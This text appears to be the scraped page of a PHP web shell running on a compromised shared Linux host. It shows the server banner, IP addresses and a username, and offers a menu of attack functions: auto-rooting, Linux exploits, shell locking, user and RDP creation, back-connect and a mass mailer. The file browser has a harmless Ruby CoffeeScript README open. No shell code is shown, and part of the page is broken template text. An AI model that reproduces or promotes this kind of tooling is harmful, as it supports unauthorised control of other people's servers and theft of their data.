Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
ruby-coffee-script /
[ HOME SHELL ]
Name
Size
Permission
Action
README.md
1.41
KB
-rw-r--r--
changelog.Debian.gz
687
B
-rw-r--r--
copyright
1.33
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
Ruby CoffeeScript ================= Ruby CoffeeScript is a bridge to the official CoffeeScript compiler. CoffeeScript.compile File.read("script.coffee") Installation ------------ gem install coffee-script *Note: This compiler library has replaced the original CoffeeScript compiler that was written in Ruby.* Dependencies ------------ This library depends on the `coffee-script-source` gem which is updated any time a new version of CoffeeScript is released. (The `coffee-script-source` gem's version number is synced with each official CoffeeScript release.) This way you can build against different versions of CoffeeScript by requiring the correct version of the `coffee-script-source` gem. In addition, you can use this library with unreleased versions of CoffeeScript by setting the `COFFEESCRIPT_SOURCE_PATH` environment variable: export COFFEESCRIPT_SOURCE_PATH=/path/to/coffee-script/extras/coffee-script.js ### JSON The `json` library is also required but is not explicitly stated as a gem dependency. If you're on Ruby 1.8 you'll need to install the `json` or `json_pure` gem. On Ruby 1.9, `json` is included in the standard library. ### ExecJS The [ExecJS](https://github.com/sstephenson/execjs) library is used to automatically choose the best JavaScript engine for your platform. Check out its [README](https://github.com/sstephenson/execjs/blob/master/README.md) for a complete list of supported engines.
Close